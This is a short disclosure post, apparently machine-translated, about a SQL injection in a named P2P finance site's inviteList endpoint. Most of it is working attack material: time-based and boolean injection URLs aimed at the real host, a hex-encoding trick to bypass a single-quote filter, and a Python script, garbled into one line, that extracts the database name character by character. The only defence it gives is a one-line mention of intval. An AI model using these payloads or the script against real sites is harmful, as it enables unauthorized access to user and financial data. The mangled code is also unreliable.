P2p financial security: SQL Injection in a website of yonglibao (with verification script)

P2p financial security: SQL Injection in a website of yonglibao (with verification script)

It is useless to filter single quotes.

 

http://m.yonglibao.com/Event/V3ReComment/inviteList?userId=(select * from (select (sleep(5)))x)

Delayed Injection is supported, but it is customary to add -- or % 23 to the end of the statement when the injection statement is written.



Lie in this pit for a long time, should this keyword be replaced... As a result, it has not been injected for a long time.



Later, we accidentally removed % 23 and found that it could be injected.



In addition, there can only be one parentheses behind the url, and no other and can appear.



After a long period of fuzz, the normal access url is
 

http://m.yonglibao.com/Event/V3ReComment/inviteList?userId=1

The number of students is 21.

Poc is
 

http://m.yonglibao.com/Event/V3ReComment/inviteList?userId=%28select%20*%20from%20%28select%20%28substring%28version%28%29,1,1%29=%275%27%29%29x%29

Cannot be injected

For example
 

I got an x. What is this.



It's okay. This is nothing more than filtering keywords. The first thought is single quotes, because int type can be identified in mysql whether or not single quotes are wrapped.


 

http://m.yonglibao.com/Event/V3ReComment/inviteList?userId=(select * from (select (substring(version(),1,1)=5))x)

I found that the single quotes are filtered out. For the first time, I liked 21...
 

Mysql is a flexible language. Strings can be replaced by hexadecimal notation. 0x.


 

The current database name is new_yonglibao_c.

 

 

 

#-*-Coding: UTF-8-*-import binasciiimport requestspay = list ('1234567890zxcvbnmasdfghjklqwertyuiop. _ @ ') data = ''for x in range (1, 16): for payload in pay: payloads = binascii. b2a_hex (payload) # convert the payload character to a hexadecimal url = 'HTTP: // m.yonglibao.com/Event/V3ReComment/inviteList? UserId = (select * from (select (substring (database (), % d, 1) = 0x % s) x) '% (x, payloads) response = requests. get (url, verify = False, timeout = 30) if '21 people' in response. content: # bool injection, directly matching different pages in the source code, okprint u'database name '+ repr (x) + U' is: '+ payload + ''+ urldata + = payloadprint U' the current database name is:' + data

 

Solution:

The intval function can defend against this SQL Injection perfectly.